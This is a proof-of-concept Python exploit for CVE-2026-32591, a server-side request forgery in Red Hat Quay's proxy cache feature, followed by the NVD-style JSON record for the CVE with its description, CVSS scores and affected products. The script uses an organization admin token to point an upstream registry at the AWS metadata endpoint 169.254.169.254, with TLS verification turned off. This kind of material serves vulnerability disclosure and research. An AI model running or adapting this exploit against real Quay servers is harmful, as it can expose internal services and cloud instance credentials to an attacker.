CVE-2026-32591

# Proof of Concept for CVE-2026-32591 # This script demonstrates how a malicious admin could configure an upstream registry # pointing to an internal service (e.g., AWS Metadata service). import requests TARGET_URL = "https://quay.example.com/api/v1/organization/testorg/registry" TOKEN = "Bearer <org_admin_token>" # Malicious hostname pointing to AWS Metadata service MALICIOUS_HOST = "http://169.254.169.254/latest/meta-data/" payload = { "registry": "internal-registry", "external_registry": MALICIOUS_HOST, "proxy_cache": True } headers = { "Authorization": TOKEN, "Content-Type": "application/json" } # Send request to create/update proxy cache configuration response = requests.post(TARGET_URL, json=payload, headers=headers, verify=False) if response.status_code == 200: print("Successfully configured malicious upstream registry.") print("Quay server will now attempt to connect to internal metadata.") else: print(f"Failed: {response.text}")

{"cve": {"id": "CVE-2026-32591", "sourceIdentifier": "[email protected]", "published": "2026-04-08T18:26:00.107", "lastModified": "2026-05-20T04:16:51.140", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in Red Hat Quay's Proxy Cache configuration feature. When an organization administrator configures an upstream registry for proxy caching, Quay makes a network connection to the specified registry hostname without verifying that it points to a legitimate external service. An attacker with organization administrator privileges could supply a crafted hostname to force the Quay server to make requests to internal network services, cloud infrastructure endpoints, or other resources that should not be accessible from the Quay application."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:L/A:N", "baseScore": 5.2, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.9, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:L/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:redhat:mirror_registry_for_red_hat_openshift:-:*:*:*:*:*:*:*", "matchCriteriaId": "63757310-FC5B-44E6-9211-36269827BC56"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:mirror_registry_for_red_hat_openshift:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "281E6AA4-1E08-488F-BA7A-F0BE7CF42A5B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:quay:3.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "B1987BDA-0113-4603-B9BE-76647EB043F2"}]}]}], "references": [{"url": "https://access.redhat.com/errata/RHSA-2026:19375", "source": "[email protected]"}, {"url": "https://access.redhat.com/security/cve/CVE-2026-32591", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2446965", "source": "[email protected]", "tags": ["Issue Tracking", "Vendor Advisory"]}]}}